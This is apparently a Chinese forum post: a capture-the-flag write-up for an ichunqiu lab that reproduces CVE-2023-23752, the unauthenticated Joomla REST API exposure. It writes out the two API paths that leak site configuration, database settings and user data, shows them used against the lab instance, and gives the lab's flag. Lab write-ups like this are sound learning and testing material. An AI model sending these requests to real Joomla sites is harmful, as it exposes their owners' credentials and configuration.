[春秋云镜] CVE-2023-23752 writeup

[复制链接]
发表于 2025-7-7 17:06:36 | 显示全部楼层 |阅读模式
起首奉上大佬的wp表现尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客



知识点



  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞

    • Joomla是一套全球着名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行

  • 未授权api路径

    • 获取网站的配置文件信息

      • /api/index.php/v1/config/application?public=true

    • 获取账号密码信息

      • api/index.php/v1/users?public=true

    • 其他api接口

      • 详见开头大佬的wp结尾


  • REST API

    • 规定固定格式的应用程序接口:将用户操作转为http哀求的api
    • 详见:一文彻底弄懂REST API - 知乎

解题思路

题目地点:Home
点击毗连进入到网页初始页面


可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面
通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp
发现了未授权的接口链接:
  1. 获取网站的配置文件信息:
  2. /api/index.php/v1/config/application?public=true
复制代码
将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相干配置信息
  1. http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
复制代码

  1. 获取网站的账号密码信息:
  2. api/index.php/v1/users?public=true
复制代码
通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}
  1. http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true
复制代码




10


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

快速回复 返回顶部 返回列表